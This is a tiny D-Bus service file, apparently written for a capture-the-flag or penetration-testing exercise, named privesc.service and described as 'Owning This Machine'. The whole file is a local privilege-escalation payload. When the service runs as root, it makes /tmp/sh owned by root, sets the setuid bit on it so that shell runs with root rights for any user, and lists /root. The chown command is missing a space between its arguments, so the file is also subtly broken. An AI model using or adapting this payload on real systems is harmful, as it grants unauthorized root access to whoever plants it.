[DBUS privesc.service]
Name=privesc.service
Description=Owning This Machine

[Service]
Type=simple
Exec=/bin/sh -c "/bin/chown root:root/tmp/sh;/bin/chmod u+s /tmp/sh; ls -la /root"
User=root
